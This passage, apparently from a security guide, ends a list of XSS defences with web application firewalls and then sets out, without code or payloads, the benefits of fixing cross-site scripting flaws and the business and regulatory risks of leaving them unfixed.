• Web Application Firewalls (WAFs): These firewalls can help to detect and block
malicious traffic, including XSS attacks, before it reaches the web application.

Advantages of Addressing XSS:

• Enhanced Security: Fixing XSS vulnerabilities significantly reduces the risk of attackers
compromising user sessions, stealing data, or launching further attacks.
• Improved User Trust: By addressing XSS vulnerabilities, organizations can build
trust with users by demonstrating their commitment to protecting user data and
privacy.
• Compliance with Regulations: Many data privacy regulations require organizations to
implement security measures to protect user data. Fixing XSS vulnerabilities helps
organizations comply with these regulations.



Disadvantages of Ignoring XSS:

• Increased Risk of Attacks: Unpatched XSS vulnerabilities leave web applications
vulnerable to attack, potentially leading to data breaches and other security incidents.
• Reputational Damage: A successful XSS attack can damage an organization's
reputation, leading to lost business and customer trust.
• Regulatory Fines: Failure to comply with data privacy regulations due to unaddressed
XSS vulnerabilities can result in significant fines.

